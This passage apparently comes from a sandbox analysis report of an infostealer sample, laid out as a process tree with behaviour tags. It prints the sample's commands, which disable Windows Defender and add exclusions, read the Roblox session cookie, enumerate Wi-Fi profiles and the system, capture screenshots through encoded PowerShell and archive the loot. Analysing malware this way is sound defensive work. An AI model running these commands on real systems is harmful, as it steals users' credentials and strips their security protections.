        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6724
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‌ .scr'"
      4⤵
      PID:6140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‌ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:8068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:552
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:7792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:7172
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:7944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:7708
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:7800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7356
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4rlputbh\4rlputbh.cmdline"
        6⤵
        
        PID:7452
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF760.tmp" "c:\Users\Admin\AppData\Local\Temp\4rlputbh\CSC795E079CA37D4866BDAF88CBFB926FB.TMP"
        7⤵
        
        PID:8016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "Camera.exe /devlist"
      4⤵
      PID:7932
    - - C:\Users\Admin\AppData\Local\Temp\_MEI52842\Camera.exe
        
        Camera.exe /devlist
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4936"
      4⤵
      PID:7140
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4936
        5⤵
        Kills process with taskkill
        
        PID:5556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2468"
      4⤵
      PID:6980
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6912
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2468
        5⤵
        Kills process with taskkill
        
        PID:3316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2360"
      4⤵
      PID:5672
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2360
        5⤵
        Kills process with taskkill
        
        PID:5348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3428"
      4⤵
      PID:6888
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3428
        5⤵
        Kills process with taskkill
        
        PID:7916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
      4⤵
      PID:7388
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 408
        5⤵
        Kills process with taskkill
        
        PID:8020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 912"
      4⤵
      PID:7148
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 912
        5⤵
        Kills process with taskkill
        
        PID:5128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2724"
      4⤵
      PID:6776
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2724
        5⤵
        Kills process with taskkill
        
        PID:6656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 540"
      4⤵
      PID:764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 540
        5⤵
        Kills process with taskkill
        
        PID:7808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 776"
      4⤵
      PID:7884
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 776
        5⤵
        Kills process with taskkill
        
        PID:8004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2560"
      4⤵
      PID:7244
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2560
        5⤵
        Kills process with taskkill
        
        PID:5496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5752
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6816
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:6260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI52842\rar.exe a -r -hpblank "C:\Users\Admin\AppData\Local\Temp\osLEC.zip" *"
      4⤵
      PID:7428
    - - C:\Users\Admin\AppData\Local\Temp\_MEI52842\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI52842\rar.exe a -r -hpblank "C:\Users\Admin\AppData\Local\Temp\osLEC.zip" *
        5⤵
        Executes dropped EXE
        
        PID:5940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:6368
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:4052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6340
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:1768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6104
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6848
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6996
- C:\Users\Admin\Downloads\build grabber.exe.exe
  "C:\Users\Admin\Downloads\build grabber.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:5564
- - C:\Users\Admin\Downloads\build grabber.exe.exe
    "C:\Users\Admin\Downloads\build grabber.exe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "net session"
      4⤵
      PID:5952
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        
        PID:6556
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:6576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\build grabber.exe.exe'"
      4⤵
      PID:6788
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\build grabber.exe.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      PID:6796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NEXT TIME DONT DOWNLOAD RANDOM FILES HAHAHAH', 0, 'GET BEAMED', 0+16);close()""
      4⤵
      PID:6804
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NEXT TIME DONT DOWNLOAD RANDOM FILES HAHAHAH', 0, 'GET BEAMED', 0+16);close()"
        5⤵
        
        PID:6236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6848
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6968
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:5128
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:6024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:5240
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6520
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:7144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6908
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:7844
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'"
      4⤵
      PID:8172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2304
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:7576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:7668
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:8164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:7692
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgAC